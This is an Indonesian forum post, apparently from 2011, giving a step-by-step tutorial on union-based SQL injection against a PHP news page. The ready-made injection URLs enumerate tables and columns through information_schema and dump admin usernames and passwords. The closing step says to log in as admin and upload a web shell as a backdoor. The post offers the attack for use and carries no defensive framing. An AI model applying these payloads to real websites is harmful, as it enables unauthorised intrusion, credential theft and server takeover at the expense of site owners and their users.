Bisik Tetangga
Untuk masuk ke forum, silahkan Login atau mendaftar (Share Your Knowledge)
Bisik Tetangga
Untuk masuk ke forum, silahkan Login atau mendaftar (Share Your Knowledge)
Bisik Tetangga
Would you like to react to this message? Create an account in a few clicks or log in to continue.


Tempat Asyik Nongkrong Sekaligus Menambah Ilmu Pengetahuan
 
IndeksPencarianLatest imagesPendaftaranLogin
Kami mohon partisipasinya dalam pengembangan forum. Klik Disini


Pasang Iklanmu disini gratis (selama masa promosi)
ads ads ads ads

Share | 
 

 SQL Injection + Backdooring

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
harryagustiana
harryagustiana
Administrator

Jumlah posting : 212
Reputasi : 11
Join date : 04.12.10
Age : 32
Lokasi : Bandung, Indonesia

SQL Injection + Backdooring  Empty
PostSubyek: SQL Injection + Backdooring    SQL Injection + Backdooring  Icon_minitimeSat Sep 24, 2011 9:20 am

---->>> 1
Kita tetapkan target terlebih dahulu
contoh: [site]/news_Event/newsDetail.php?ID=2

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada vuln.
contoh:
[site]/news_Event/newsDetail.php?ID=-2 atau [site]/news_Event/newsDetail.php?ID=2'


---->>> 2
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : +order+by+

contoh:
[site]//news_Event/newsDetail.php?ID=-2+order+by+1--

sekarang cek secara satu per satu
contoh:
[site]/news_Event/newsDetail.php?ID=-2+order+by+1--
[site]/news_Event/newsDetail.php?ID=-2+order+by+2--
[site]/news_Event/newsDetail.php?ID=-2+order+by+3--
[site]/news_Event/newsDetail.php?ID=-2+order+by+4--

sehingga muncul error atau hilang pesan error...
misal:
[site]/news_Event/newsDetail.php?ID=-2+order+by+5--

berarti yang kita ambil adalah sampai angka 4
menjadi
[site]/news_Event/newsDetail.php?ID=-2+order+by+4--


--->>> 3
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 5
maka:
[site]/news_Event/newsDetail.php?ID=-2+order+by+4--

ok ,yg keluar angka 2
gunakan perintah version() untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
contoh:
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,version(),3,4--

lihat versi yg digunakan, jika versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah from+information_schema
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah from+information_schema


--->>> 4
Untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema =database()-- -> dimasukan setelah angka terakhir

contoh:
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(table_name),3,4+from +information_schema.tables+where+table_schema=data base()--

seumpama yg kita cari adalah "admin"


--->>> 5
Perintah group_concat(column_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name= 0xhexa-- -> dimasukan setelah angka terakhir

[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(column_name),3,4+fro m+information_schema.columns+where+table_name=0xhe xa--

pada tahap ini kalian wajib menconvert kata pada isi table menjadi hexadecimal.
website yg digunakan untuk konversi :

[You must be registered and logged in to see this link.]

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646d696e

[site]news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(column_name),3,4+fro m+information_schema.columns+where+table_name=0x61 646d696e--


--->>> 6
Memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah group_concat(0x3a,hasil isi column yg mau dikeluarkan) -> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) -> dimasukan setelah angka terakhir

[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(0x3a,hasil isi column),3,4+from+(nama table berasal)--

contoh kata yang keluar adalah adminID,Name,password

maka
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(adminID,0x3a,Name,0x 3a,password),3,4+from+admin--

Nah dah nemu ID dan password-nya sekarang [You must be registered and logged in to see this image.]

ket: 0x3a sama dengan : <- titik dua


--->>> 7
Mencari halaman login Admin
Login sebagai admin
Cari fitur2 upload file atau gambar, lalu upload shell kalian

masih blum jelas yah ... ni download videonya [You must be registered and logged in to see this link.]
Kembali Ke Atas Go down
http://www.bisiktetangga.co.cc/
 

SQL Injection + Backdooring

Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
Bisik Tetangga :: Komputer :: Web Developer & Web Master-